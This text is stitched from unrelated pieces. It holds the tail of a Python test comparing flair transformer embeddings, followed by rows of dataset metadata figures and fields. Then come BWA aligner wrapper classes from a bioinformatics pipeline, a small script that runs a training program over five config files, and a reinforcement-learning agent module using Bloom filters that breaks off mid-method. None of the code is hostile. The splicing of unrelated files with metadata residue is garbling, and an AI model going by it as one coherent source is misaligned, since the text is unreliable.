    # | | | | | | | | | | |
    # Berlin and Munich have a lot of puppeteer to see .
    #
    # 0 1 2 3 4 5 6 7 8 9 10
    def embed_sentence(
        sentence: str, layers: str = "1", use_scalar_mix: bool = False
    ) -> Sentence:
        # Helper: embed a sentence with flair's TransformerXLEmbeddings using
        # the given layer configuration and return the flair Sentence.
        embeddings = TransformerXLEmbeddings(
            pretrained_model_name_or_path=transfo_model,
            layers=layers,
            use_scalar_mix=use_scalar_mix,
        )
        flair_sentence = Sentence(sentence)
        embeddings.embed(flair_sentence)
        return flair_sentence
    # Word-level tokens map one-to-one, so positions 0 and 7 compare directly.
    sentence = embed_sentence(sentence=s)
    first_token_embedding_ref = first_layer[0].tolist()
    first_token_embedding_actual = sentence.tokens[0].embedding.tolist()
    puppeteer_embedding_ref = first_layer[7].tolist()
    puppeteer_embedding_actual = sentence.tokens[7].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert puppeteer_embedding_ref == puppeteer_embedding_actual
    # Check embedding dimension when using multiple layers
    sentence_mult_layers = embed_sentence(sentence="Munich", layers="1,2,3,4")
    ref_embedding_size = 4 * model.d_embed  # four concatenated layers
    actual_embedding_size = len(sentence_mult_layers.tokens[0].embedding)
    assert ref_embedding_size == actual_embedding_size
    # Check embedding dimension when using multiple layers and scalar mix
    sentence_mult_layers_scalar_mix = embed_sentence(
        sentence="Berlin", layers="1,2,3,4", use_scalar_mix=True
    )
    ref_embedding_size = 1 * model.d_embed  # scalar mix collapses the layers
    actual_embedding_size = len(sentence_mult_layers_scalar_mix.tokens[0].embedding)
    assert ref_embedding_size == actual_embedding_size
@pytest.mark.slow
def test_xlm_embeddings():
    """Compare XLMEmbeddings against hidden states taken directly from the
    underlying transformers XLM model, for every subword pooling operation
    and for multi-layer / scalar-mix setups.
    """
    xlm_model: str = "xlm-mlm-en-2048"
    tokenizer = XLMTokenizer.from_pretrained(xlm_model)
    model = XLMModel.from_pretrained(
        pretrained_model_name_or_path=xlm_model, output_hidden_states=True
    )
    model.to(flair.device)
    model.eval()
    s: str = "Berlin and Munich have a lot of puppeteer to see ."
    # Reference values: run the raw model on the sentence wrapped in <s>...</s>
    # markers and keep entry 1 of the hidden-states tuple as the "first layer".
    with torch.no_grad():
        tokens = tokenizer.tokenize("<s>" + s + "</s>")
        indexed_tokens = tokenizer.convert_tokens_to_ids(tokens)
        tokens_tensor = torch.tensor([indexed_tokens])
        tokens_tensor = tokens_tensor.to(flair.device)
        hidden_states = model(tokens_tensor)[-1]
        first_layer = hidden_states[1][0]
    assert len(first_layer) == len(tokens)
    # 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14
    #
    # <s> 'berlin</w>', 'and</w>', 'munich</w>', 'have</w>', 'a</w>', 'lot</w>', 'of</w>', 'pupp', 'ete', 'er</w>', 'to</w>', 'see</w>', '.</w>', '</s>
    # | | | | | | | \ | / | | |
    # Berlin and Munich have a lot of puppeteer to see .
    #
    # 0 1 2 3 4 5 6 7 8 9 10
    def embed_sentence(
        sentence: str,
        pooling_operation,
        layers: str = "1",
        use_scalar_mix: bool = False,
    ) -> Sentence:
        # Helper: embed a sentence with flair's XLMEmbeddings using the
        # given pooling / layer configuration and return the flair Sentence.
        embeddings = XLMEmbeddings(
            pretrained_model_name_or_path=xlm_model,
            layers=layers,
            pooling_operation=pooling_operation,
            use_scalar_mix=use_scalar_mix,
        )
        flair_sentence = Sentence(sentence)
        embeddings.embed(flair_sentence)
        return flair_sentence
    # First subword embedding ("Berlin" -> 'berlin</w>' at 1; "puppeteer" -> 'pupp' at 8)
    sentence_first_subword = embed_sentence(sentence=s, pooling_operation="first")
    first_token_embedding_ref = first_layer[1].tolist()
    first_token_embedding_actual = sentence_first_subword.tokens[0].embedding.tolist()
    puppeteer_first_subword_embedding_ref = first_layer[8].tolist()
    puppeteer_first_subword_embedding_actual = sentence_first_subword.tokens[
        7
    ].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert (
        puppeteer_first_subword_embedding_ref
        == puppeteer_first_subword_embedding_actual
    )
    # Last subword embedding ('berlin</w>' is a single subword, so index 1 again)
    sentence_last_subword = embed_sentence(sentence=s, pooling_operation="last")
    first_token_embedding_ref = first_layer[1].tolist()
    first_token_embedding_actual = sentence_last_subword.tokens[0].embedding.tolist()
    puppeteer_last_subword_embedding_ref = first_layer[10].tolist()
    puppeteer_last_subword_embedding_actual = sentence_last_subword.tokens[
        7
    ].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert (
        puppeteer_last_subword_embedding_ref == puppeteer_last_subword_embedding_actual
    )
    # First and last subword embedding (first == last for single-subword tokens)
    sentence_first_last_subword = embed_sentence(
        sentence=s, pooling_operation="first_last"
    )
    first_token_embedding_ref = torch.cat([first_layer[1], first_layer[1]]).tolist()
    first_token_embedding_actual = sentence_first_last_subword.tokens[
        0
    ].embedding.tolist()
    puppeteer_first_last_subword_embedding_ref = torch.cat(
        [first_layer[8], first_layer[10]]
    ).tolist()
    puppeteer_first_last_subword_embedding_actual = sentence_first_last_subword.tokens[
        7
    ].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert (
        puppeteer_first_last_subword_embedding_ref
        == puppeteer_first_last_subword_embedding_actual
    )
    # Mean of all subword embeddings
    sentence_mean_subword = embed_sentence(sentence=s, pooling_operation="mean")
    first_token_embedding_ref = calculate_mean_embedding([first_layer[1]]).tolist()
    first_token_embedding_actual = sentence_mean_subword.tokens[0].embedding.tolist()
    puppeteer_mean_subword_embedding_ref = calculate_mean_embedding(
        [first_layer[8], first_layer[9], first_layer[10]]
    ).tolist()
    puppeteer_mean_subword_embedding_actual = sentence_mean_subword.tokens[
        7
    ].embedding.tolist()
    assert first_token_embedding_ref == first_token_embedding_actual
    assert (
        puppeteer_mean_subword_embedding_ref == puppeteer_mean_subword_embedding_actual
    )
    # Check embedding dimension when using multiple layers
    sentence_mult_layers = embed_sentence(
        sentence="Munich", pooling_operation="first", layers="1,2,3,4"
    )
    ref_embedding_size = 4 * model.embeddings.embedding_dim  # four concatenated layers
    actual_embedding_size = len(sentence_mult_layers.tokens[0].embedding)
    assert ref_embedding_size == actual_embedding_size
    # Check embedding dimension when using multiple layers and scalar mix
    sentence_mult_layers_scalar_mix = embed_sentence(
        sentence="Berlin",
        pooling_operation="first",
        layers="1,2,3,4",
        use_scalar_mix=True,
    )
    ref_embedding_size = 1 * model.embeddings.embedding_dim  # scalar mix: one layer
    actual_embedding_size = len(sentence_mult_layers_scalar_mix.tokens[0].embedding)
    assert ref_embedding_size == actual_embedding_size
| 35.947368
| 154
| 0.660258
| 3,625
| 31,418
| 5.354207
| 0.047172
| 0.078314
| 0.08223
| 0.047607
| 0.92488
| 0.91911
| 0.918491
| 0.900768
| 0.900356
| 0.900304
| 0
| 0.018623
| 0.254822
| 31,418
| 873
| 155
| 35.988545
| 0.809927
| 0.164364
| 0
| 0.711409
| 0
| 0
| 0.029121
| 0
| 0
| 0
| 0
| 0
| 0.100671
| 1
| 0.021812
| false
| 0
| 0.011745
| 0
| 0.045302
| 0.003356
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73513581e39349f68e5aef2d3e95a23083be2f15
| 15,719
|
py
|
Python
|
modules/BWA.py
|
tyrmi/STAPLER
|
fd83eee4be0bb78c67a111fd1c1c1dff4c16aefe
|
[
"BSD-3-Clause"
] | 4
|
2017-07-17T07:45:39.000Z
|
2021-01-12T00:33:10.000Z
|
modules/BWA.py
|
tyrmi/STAPLER
|
fd83eee4be0bb78c67a111fd1c1c1dff4c16aefe
|
[
"BSD-3-Clause"
] | null | null | null |
modules/BWA.py
|
tyrmi/STAPLER
|
fd83eee4be0bb78c67a111fd1c1c1dff4c16aefe
|
[
"BSD-3-Clause"
] | null | null | null |
import os
from GenericBase import GenericBase
from STAPLERerror import STAPLERerror
from STAPLERerror import VirtualIOError
import utils
class bwa_mem(GenericBase):
"""Class for using BWA MEM algorithm.
Parameters:
in_cmd: String containing a command line
in_dir: Directory object containing input files
out_dir: Directory object containing output files
NOTICE! Keep the directory objects up to date about file edits!
Attributes:
name: Name of the function.
input_type: Input types accepted by this application.
output_types: List of output types produced by the application.
mandatory_args: Args that must be provided in in_cmd when initializing.
user_mandatory_args: Args the user must provide.
remove_user_args: Args that will be removed from the final command.
optional_args: Args that may be part of the command line.
in_cmd: Command entered by user.
parsed_cmd: Final output command as option:value dict.
file_names: Names of output files.
command_ids: File names of input file(s) with no file extensions.
Methods:
get_cmd: Method for getting the final cmd line string for output.
"""
name = 'stapler_bwa_mem'
input_types = {'.fastq', '.fq'}
output_types = ['.sam']
hidden_mandatory_args = ['--!fastq1', '--!reference_path', '--!out']
user_mandatory_args = ['--!reference_path']
remove_user_args = ['--!read_format']
user_optional_args = ['--!read_format', '--!fastq2', '-t', '-k', '-w', '-d',
'-r', '-c', '-A', '-B', '-O', '-E', '-L', '-U', '-R', '-v',
'-M', '-T', '-P', '-p', '-C', '-H']
parallelizable = True
help_description = '''
Both paired-end and single-end data can be used as input but not at the same
time. Paired-end mode is used when --!read_format argument is present in the
command line, otherwise single-end data is assumed.
--!read_format argument is mandatory if you have paired-end data.
This argument indicates the format in which read number is shown in
file names. For instance if you have paired end files samplename_R1 and
samplename_R2, the --!read_format argument should look like this:
--!read_format _R?
--!reference_path argument is the path to index database file created by
applying 'bwa index' to your reference fasta file. You must do this manually.
'''
def _select_IO(self, out_cmd, in_dir, out_dir):
    """Infers the input and output file paths.

    This method must keep the directory objects up to date of the file
    edits!

    Parameters:
    out_cmd: A dict containing the command line.
    in_dir: Input directory object.
    out_dir: Output directory object.

    Returns:
    out_cmd: Dict containing the output command arguments.
    command_ids: Input-file-name based identifiers for the current command.

    Raises:
    STAPLERerror: If --!reference_path is missing/invalid or --!read_format
    is malformed.
    VirtualIOError: No valid input file can be found.
    """
    command_ids = []
    # --!reference_path is user-mandatory: validate its presence and target.
    if '--!reference_path' not in self.parsed_in_cmd:
        raise STAPLERerror('--!reference_path argument is required for this '
                           'command!')
    if not os.path.isfile(self.parsed_in_cmd['--!reference_path']):
        raise STAPLERerror('The path to reference file does not exist:\n{0}'
                           .format(self.parsed_in_cmd['--!reference_path']))
    # Look for the optional --!read_format argument (paired-end mode marker).
    # NOTE: .iteritems() is the Python 2 dict API.
    read_format = ''
    for arg, value in out_cmd.iteritems():
        if arg == '--!read_format':
            read_format = value
            break
    if read_format:
        # The pattern must contain exactly one '?' placeholder for the read
        # number (e.g. '_R?') and at least one other character.
        if read_format.count('?') != 1:
            raise STAPLERerror('{0} needs a one "?" in --!read_format argument!'
                               .format(self.name))
        if len(read_format) < 2:
            raise STAPLERerror('{0} argument --!read_format value should have '
                               'length of at least 2!'
                               .format(self.name))
        # 'arg' still names '--!read_format' here, because the loop above
        # broke on that key; remove it from the final command.
        del out_cmd[arg]
    IO_files = {}
    #Handle paired end files
    if read_format:
        # Ask the input directory for unused read pairs matching the pattern.
        paired_files = in_dir.file_pairs(pattern=self.parsed_in_cmd['--!read_format'],
                                         user=self.name,
                                         file_formats=list(self.input_types),
                                         exclusion_iterable=['pairless',
                                                             'unmatched'])
        file_names = set()
        for pair in paired_files:
            pair1, pair2 = pair
            # Only consume a pair neither member of which this tool has used.
            if self.name not in in_dir.file_names[pair1].users and self.name not in in_dir.file_names[pair2].users:
                #Infer inputs
                IO_files['--!fastq1'] = os.path.join(in_dir.path, pair1)
                command_ids.append(utils.infer_path_id(IO_files['--!fastq1']))
                in_dir.use_file(pair1, self.name)
                IO_files['--!fastq2'] = os.path.join(in_dir.path, pair2)
                command_ids.append(utils.infer_path_id(IO_files['--!fastq2']))
                in_dir.use_file(pair2, self.name)
                #Infer output
                # Output name: pair1 without extension and without the read
                # format pattern, plus the output extension ('.sam').
                output_name = utils.splitext(pair1)[0]
                output_name = output_name.replace(self.parsed_in_cmd[
                                                      '--!read_format'],
                                                  '')
                output_name += self.output_types[0]
                output_path = os.path.join(out_dir.path, output_name)
                IO_files['--!out'] = output_path
                file_names.add(output_name)
                out_dir.add_file(output_name)
                break
    else: #Handle single end files
        file_names = set()
        for fl in in_dir.files:
            # Take the first unused input file with an accepted extension.
            if self.name not in fl.users:
                if utils.splitext(fl.name)[-1] in self.input_types:
                    IO_files['--!fastq1'] = os.path.join(in_dir.path, fl.name)
                    command_ids.append(utils.infer_path_id(IO_files['--!fastq1']))
                    in_dir.use_file(fl.name, self.name)
                    assert len(self.output_types) == 1, 'Several output ' \
                                                        'types, override ' \
                                                        'this method!'
                    output_name = utils.splitext(fl.name)[0] + \
                                  self.output_types[0]
                    output_path = os.path.join(out_dir.path, output_name)
                    IO_files['--!out'] = output_path
                    file_names.add(output_name)
                    out_dir.add_file(output_name)
                    break
    # No unused inputs left: signal the caller that this tool is finished.
    if not IO_files:
        raise VirtualIOError('No more unused input files')
    out_cmd.update(IO_files)
    return out_cmd, command_ids
def get_cmd(self):
"""Returns the final command line.
Returns:
final_cmd: List of command line produced by the object (line breaks not allowed within command lines!).
"""
run_command = utils.parse_config(self.name, 'cmd_name', 'execute')
final_cmd = [run_command]
for arg, val in self.out_cmd.iteritems():
if arg in ['--!reference_path',
'--!fastq1',
'--!fastq2',
'--!out']:
continue
final_cmd.append(arg + ' ' + val)
final_cmd.append(self.out_cmd['--!reference_path'])
final_cmd.append(self.out_cmd['--!fastq1'])
if '--!fastq2' in self.out_cmd:
final_cmd.append(self.out_cmd['--!fastq2'])
final_cmd.append('> ' + self.out_cmd['--!out'])
return [' '.join(final_cmd)]
class bwa_bwasw(GenericBase):
    """Class for using the BWA bwasw alignment algorithm.

    Parameters:
    in_cmd: String containing a command line
    in_dir: Directory object containing input files
    out_dir: Directory object containing output files

    NOTICE! Keep the directory objects up to date about file edits!

    Attributes:
    name: Name of the function.
    input_types: Input types accepted by this application.
    output_types: List of output types produced by the application.
    hidden_mandatory_args: Args that must be present in the final command.
    user_mandatory_args: Args the user must provide.
    remove_user_args: Args that will be removed from the final command.
    user_optional_args: Args that may be part of the command line.
    in_cmd: Command entered by user.
    parsed_cmd: Final output command as option:value dict.
    file_names: Names of output files.
    command_ids: File names of input file(s) with no file extensions.

    Methods:
    get_cmd: Method for getting the final cmd line string for output.
    """
    name = 'stapler_bwa_bwasw'
    input_types = {'.fastq', '.fq'}
    output_types = ['.sam']
    hidden_mandatory_args = ['--!fastq1', '--!reference_path', '--!out']
    user_mandatory_args = ['--!reference_path']
    remove_user_args = []
    user_optional_args = ['--!read_format', '-a', '-b', '-q', '-r', '-w', '-m',
                          '-t', '-H', '-C', '-M', '-S', '-I', '-T', '-c', '-z',
                          '-s', '-N', '-G']
    parallelizable = True
    help_description = '''
Both paired-end and single-end data can be used as input but not at the same
time. Paired-end mode is used when --!read_format argument is present in the
command line, otherwise single-end data is assumed.
--!read_format argument is mandatory if you have paired-end data.
This argument indicates the format in which read number is shown in
file names. For instance if you have paired end files samplename_R1 and
samplename_R2, the --!read_format argument should look like this:
--!read_format _R?
--!reference_path argument is the path to index database file created by
applying 'bwa index' to your reference fasta file. You must do this manually.
'''

    def _select_IO(self, out_cmd, in_dir, out_dir):
        """Infer the input and output file paths for one command instance.

        This method must keep the directory objects up to date of the file
        edits!

        Parameters:
        out_cmd: A dict containing the command line.
        in_dir: Input directory.
        out_dir: Output directory.

        Returns:
        out_cmd: Dict containing the output commands.
        command_ids: Input file name based identifier(s) for the current
            command.

        Raises:
        STAPLERerror: --!reference_path is missing/invalid or --!read_format
            is malformed.
        VirtualIOError: No valid input file can be found.
        """
        command_ids = []
        if '--!reference_path' not in self.parsed_in_cmd:
            raise STAPLERerror('--!reference_path argument is required for this '
                               'command!')
        if not os.path.isfile(self.parsed_in_cmd['--!reference_path']):
            raise STAPLERerror('The path to reference file does not exist:\n{0}'
                               .format(self.parsed_in_cmd['--!reference_path']))
        read_format = ''
        for arg, value in out_cmd.iteritems():
            if arg == '--!read_format':
                read_format = value
                break
        if read_format:
            if read_format.count('?') != 1:
                raise STAPLERerror('{0} needs a one "?" in --!read_format argument!'
                                   .format(self.name))
            if len(read_format) < 2:
                raise STAPLERerror('{0} argument --!read_format value should have '
                                   'length of at least 2!'
                                   .format(self.name))
            del out_cmd[arg]
        IO_files = {}
        #Handle paired end files
        if read_format:
            paired_files = in_dir.file_pairs(pattern=self.parsed_in_cmd['--!read_format'],
                                             user=self.name,
                                             file_formats=list(self.input_types),
                                             exclusion_iterable=['pairless',
                                                                 'unmatched'])
            file_names = set()
            for pair in paired_files:
                pair1, pair2 = pair
                if self.name not in in_dir.file_names[pair1].users and self.name not in in_dir.file_names[pair2].users:
                    #Infer inputs
                    IO_files['--!fastq1'] = os.path.join(in_dir.path, pair1)
                    command_ids.append(utils.infer_path_id(IO_files['--!fastq1']))
                    in_dir.use_file(pair1, self.name)
                    IO_files['--!fastq2'] = os.path.join(in_dir.path, pair2)
                    command_ids.append(utils.infer_path_id(IO_files['--!fastq2']))
                    in_dir.use_file(pair2, self.name)
                    #Infer output
                    output_name = utils.splitext(pair1)[0]
                    output_name = output_name.replace(self.parsed_in_cmd[
                                                          '--!read_format'],
                                                      '')
                    output_name += self.output_types[0]
                    output_path = os.path.join(out_dir.path, output_name)
                    IO_files['--!out'] = output_path
                    file_names.add(output_name)
                    out_dir.add_file(output_name)
                    break
        else: #Handle single end files
            file_names = set()
            for fl in in_dir.files:
                if self.name not in fl.users:
                    if utils.splitext(fl.name)[-1] in self.input_types:
                        IO_files['--!fastq1'] = os.path.join(in_dir.path, fl.name)
                        # BUG FIX: the key used to read this value back was
                        # '--!fastq' (missing the trailing '1'), which raised
                        # KeyError for every single-end input file.
                        command_ids.append(utils.infer_path_id(IO_files['--!fastq1']))
                        in_dir.use_file(fl.name, self.name)
                        assert len(self.output_types) == 1, 'Several output ' \
                                                            'types, override ' \
                                                            'this method!'
                        output_name = utils.splitext(fl.name)[0] + \
                                      self.output_types[0]
                        output_path = os.path.join(out_dir.path, output_name)
                        IO_files['--!out'] = output_path
                        file_names.add(output_name)
                        out_dir.add_file(output_name)
                        break
        if not IO_files:
            raise VirtualIOError('No more unused input files')
        out_cmd.update(IO_files)
        return out_cmd, command_ids

    def get_cmd(self):
        """Returns the final command line.

        Returns:
        final_cmd: List of command line produced by the object (line breaks
            not allowed within command lines!).
        """
        run_command = utils.parse_config(self.name, 'cmd_name', 'execute')
        final_cmd = [run_command]
        # Hidden args are placed positionally after the user options below.
        for arg, val in self.out_cmd.iteritems():
            if arg in ['--!reference_path',
                       '--!fastq1',
                       '--!fastq2',
                       '--!out']:
                continue
            final_cmd.append(arg + ' ' + val)
        final_cmd.append(self.out_cmd['--!reference_path'])
        final_cmd.append(self.out_cmd['--!fastq1'])
        if '--!fastq2' in self.out_cmd:
            final_cmd.append(self.out_cmd['--!fastq2'])
        final_cmd.append('> ' + self.out_cmd['--!out'])
        return [' '.join(final_cmd)]
| 44.65625
| 119
| 0.549844
| 1,865
| 15,719
| 4.447185
| 0.124933
| 0.039788
| 0.01688
| 0.018085
| 0.974439
| 0.96817
| 0.96817
| 0.96817
| 0.96817
| 0.96817
| 0
| 0.006865
| 0.351358
| 15,719
| 352
| 120
| 44.65625
| 0.806591
| 0.197595
| 0
| 0.92
| 0
| 0
| 0.224979
| 0
| 0
| 0
| 0
| 0
| 0.008889
| 1
| 0.017778
| false
| 0
| 0.022222
| 0
| 0.146667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7dfe985593a8641cbc797d00ff486247afdfaba3
| 580
|
py
|
Python
|
eval_covid20cases_timm-regnetx_002_ImageCompression.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_covid20cases_timm-regnetx_002_ImageCompression.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_covid20cases_timm-regnetx_002_ImageCompression.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
import os

# The five evaluation commands differ only in the fold index (0-4),
# so build them from a single template instead of listing five literals.
_CMD_TEMPLATE = ('python main.py --configs '
                 'configs/eval_covid20cases_unetplusplus_timm-regnetx_002_'
                 '{0}_ImageCompression.yml')

for fold in range(5):
    os.system(_CMD_TEMPLATE.format(fold))
| 52.727273
| 110
| 0.856897
| 80
| 580
| 5.8375
| 0.3
| 0.107066
| 0.12848
| 0.203426
| 0.890792
| 0.890792
| 0.890792
| 0.890792
| 0.890792
| 0.890792
| 0
| 0.054645
| 0.053448
| 580
| 11
| 111
| 52.727273
| 0.795993
| 0
| 0
| 0
| 0
| 0
| 0.886403
| 0.671256
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b43a86d9d03e750fe2d90844bf9a46cd960135ff
| 11,492
|
py
|
Python
|
rl3/agent/bloom.py
|
leferrad/rl-3
|
b8cd81efc0d2619a31790d5e919c44fa1526d344
|
[
"BSD-3-Clause"
] | null | null | null |
rl3/agent/bloom.py
|
leferrad/rl-3
|
b8cd81efc0d2619a31790d5e919c44fa1526d344
|
[
"BSD-3-Clause"
] | null | null | null |
rl3/agent/bloom.py
|
leferrad/rl-3
|
b8cd81efc0d2619a31790d5e919c44fa1526d344
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""""""
__author__ = 'leferrad'
from sklearn.linear_model import PassiveAggressiveRegressor, SGDRegressor
from bloom_filter import BloomFilter
import numpy as np
class SGDRegressor2:
    """Minimal linear model trained with a gradient-style update rule.

    Weights start as random Gaussian values scaled by 1/sqrt(D).
    """

    def __init__(self, D, lr=1e-4):
        # Variance-scaled random initial weights for a D-dimensional input.
        self.w = np.random.randn(D) / np.sqrt(D)
        self.lr = lr

    def partial_fit(self, x, y, e):
        """Apply one update step: w += lr * (y - x.w) * e."""
        if not isinstance(x, np.ndarray):
            x = np.array(x)
        if not isinstance(y, np.ndarray):
            y = np.array(y)
        prediction_error = y - x.dot(self.w)
        self.w += self.lr * prediction_error * e

    def predict(self, x):
        """Return the linear prediction x.w for the given feature vector."""
        return np.array(x).dot(self.w)
class QubeBloomRegAgent(object):
    """Agent with one SGD regressor per action plus a Bloom filter that
    (approximately) remembers which states have been visited.

    Parameters:
    env: Environment exposing actions_available and sample_action().
    feature_transformer: Object with a transform(state, normalize) method.
    """

    def __init__(self, env, feature_transformer):
        self.env = env
        self.models = {}
        self.feature_transformer = feature_transformer
        for a in env.actions_available:
            self.models[a] = SGDRegressor(loss='squared_epsilon_insensitive', penalty='l2',
                                          alpha=0.01, fit_intercept=True,
                                          shuffle=False, epsilon=0.1, learning_rate='optimal',
                                          eta0=0.01, power_t=0.25)
        # Approximate membership structure for visited states.
        self.bloom_states = BloomFilter(max_elements=256**2)

    def predict_from_action(self, s, a):
        """Return the predicted value of taking action a in state s.

        An unfitted model cannot predict yet; treat that as value 0.0.
        """
        X = self.feature_transformer.transform(s, normalize=True)
        try:
            y = self.models[a].predict(X)[0]
        except Exception:
            # BUG FIX: was a bare `except:` which also swallowed
            # KeyboardInterrupt/SystemExit; Exception keeps the intended
            # "model not fitted yet -> 0.0" behaviour only.
            y = 0.0
        return y

    def predict(self, s):
        """Return the predicted values of all actions for state s."""
        return np.array([self.predict_from_action(s, a) for a in self.models.keys()])

    def update(self, s, a, G, gamma=0.99, lambda_=0.7):
        """Fit the model of action a towards return G (gamma/lambda_ unused)."""
        X = self.feature_transformer.transform(s, normalize=True)
        self.models[a].partial_fit(np.array([X]), np.array([G]))

    def sample_action(self, s, eps):
        """Exploit promising seen states, otherwise explore.

        Note: eps is accepted for interface compatibility but not used.
        """
        x = tuple(self.feature_transformer.transform(s, normalize=False))
        if x in self.bloom_states:
            # Maybe it's a seen state (Bloom filters can yield false positives).
            # Build the action list once so np.argmax indexes the same order
            # the values were computed in (and so it also works on Python 3).
            actions = list(self.models.keys())
            G = [self.predict_from_action(s, a) for a in actions]
            self.bloom_states.add(x)
            if np.max(G) > 1.0:
                # It's a good state to exploit
                return actions[np.argmax(G)]
            # It's not important, so we can explore
            return self.env.sample_action()
        else:
            # It's not a seen state, so we can explore
            self.bloom_states.add(x)
            return self.env.sample_action()
class QubeBloomDualRegAgent(object):
    """Agent with two SGD regressor banks: regular models updated on every
    experience and 'elite' models updated only on high-return (G > 1.0)
    experiences. A Bloom filter approximately tracks visited states.

    Parameters:
    env: Environment exposing actions_available and sample_action().
    feature_transformer: Object with a transform(state, normalize) method.
    """

    def __init__(self, env, feature_transformer):
        self.env = env
        self.models = {}
        self.models_elite = {}
        self.feature_transformer = feature_transformer
        for a in env.actions_available:
            self.models[a] = SGDRegressor(loss='epsilon_insensitive', penalty='l2',
                                          alpha=0.001, fit_intercept=True,
                                          shuffle=False, epsilon=0.01, learning_rate='constant',
                                          eta0=0.01, power_t=0.25)
            self.models_elite[a] = SGDRegressor(loss='epsilon_insensitive', penalty='l2',
                                                alpha=0.001, fit_intercept=True,
                                                shuffle=False, epsilon=0.01, learning_rate='constant',
                                                eta0=0.01)
        self.bloom_states = BloomFilter(max_elements=256**2)

    def predict(self, s):
        """Return the predicted values of all actions for state s."""
        return np.array([self.predict_from_action(s, a) for a in self.models.keys()])

    def predict_from_action(self, s, a):
        """Predicted value of action a in state s; 0.0 if the model is unfitted."""
        X = self.feature_transformer.transform(s, normalize=True)
        try:
            y = self.models[a].predict(X)[0]
        except Exception:
            # BUG FIX: narrowed from a bare `except:`; predict() raises
            # until the model has seen its first partial_fit.
            y = 0.0
        return y

    def predict_from_action_elite(self, s, a):
        """Elite-model prediction for action a in state s; 0.0 if unfitted."""
        X = self.feature_transformer.transform(s, normalize=True)
        try:
            y = self.models_elite[a].predict(X)[0]
        except Exception:
            y = 0.0
        return y

    def update(self, s, a, G, gamma=0.99, lambda_=0.7):
        """Fit the regular model towards G; fit the elite model too when G > 1.0.

        gamma and lambda_ are accepted for interface compatibility only.
        """
        X = self.feature_transformer.transform(s, normalize=True)
        self.models[a].partial_fit(np.array([X]), np.array([G]))
        if G > 1.0:
            self.models_elite[a].partial_fit(np.array([X]), np.array([G]))

    def sample_action(self, s, eps):
        """Choose an action, preferring confident elite predictions.

        eps is accepted for interface compatibility but not used.
        """
        x = tuple(self.feature_transformer.transform(s, normalize=False))
        if x in self.bloom_states:
            # Maybe it's a seen state (Bloom filters can give false positives).
            # Evaluate both model banks in the same `actions` order so that
            # np.argmax indexes the correct action (the original iterated
            # self.models_elite.keys() separately for G_elite).
            actions = list(self.models.keys())
            G = [self.predict_from_action(s, a) for a in actions]
            max_G = np.max(G)
            G_elite = [self.predict_from_action_elite(s, a) for a in actions]
            max_G_elite = np.max(G_elite)
            if (max_G_elite - max(0.0, max_G)) > 0.5 and max_G_elite >= 1.0:
                print("Taking an elitist action!")
                return actions[np.argmax(G_elite)]
            else:
                a = actions[np.argmax(G)]
                # NOTE(review): an on-policy elite-model update was sketched
                # here previously but is disabled.
                if max_G > 1.0:
                    # It's a good state to exploit
                    return a
                else:
                    # It's not important, so we can explore
                    return self.env.sample_action()
        else:
            # It's not a seen state, so we can explore
            self.bloom_states.add(x)
            return self.env.sample_action()
class QubeBloomPARAgent(object):
    """Agent with one PassiveAggressive regressor per action plus a Bloom
    filter that approximately tracks visited states.

    Parameters:
    env: Environment exposing actions_available and sample_action().
    feature_transformer: Object with a transform(state, normalize) method.
    """

    def __init__(self, env, feature_transformer):
        self.env = env
        self.models = {}
        self.feature_transformer = feature_transformer
        for a in env.actions_available:
            self.models[a] = PassiveAggressiveRegressor(C=1.0, fit_intercept=True, shuffle=False)
        self.bloom_states = BloomFilter(max_elements=256**2)
        # Counter of states that were not yet present in the Bloom filter.
        self.nonseen_states = 0

    def predict(self, s):
        """Return the predicted values of all actions for state s."""
        return np.array([self.predict_from_action(s, a) for a in self.models.keys()])

    def predict_from_action(self, s, a):
        """Predicted value of action a in state s; 0.0 if the model is unfitted."""
        X = self.feature_transformer.transform(s, normalize=True)
        try:
            y = self.models[a].predict(X)[0]
        except Exception:
            # BUG FIX: narrowed from a bare `except:`; predict() raises
            # until the model has seen its first partial_fit.
            y = 0.0
        return y

    def update(self, s, a, G, gamma=0.99, lambda_=0.7):
        """Fit the model of action a towards return G (gamma/lambda_ unused)."""
        X = self.feature_transformer.transform(s, normalize=True)
        self.models[a].partial_fit(np.array([X]), np.array([G]))

    def sample_action(self, s, eps):
        """Exploit promising seen states, otherwise explore (eps unused)."""
        x = tuple(self.feature_transformer.transform(s, normalize=False))
        if x in self.bloom_states:
            # Maybe it's a seen state (Bloom filters can yield false positives).
            # One action list keeps value order and argmax index aligned.
            actions = list(self.models.keys())
            G = [self.predict_from_action(s, a) for a in actions]
            self.bloom_states.add(x)
            if np.max(G) > 1.0:
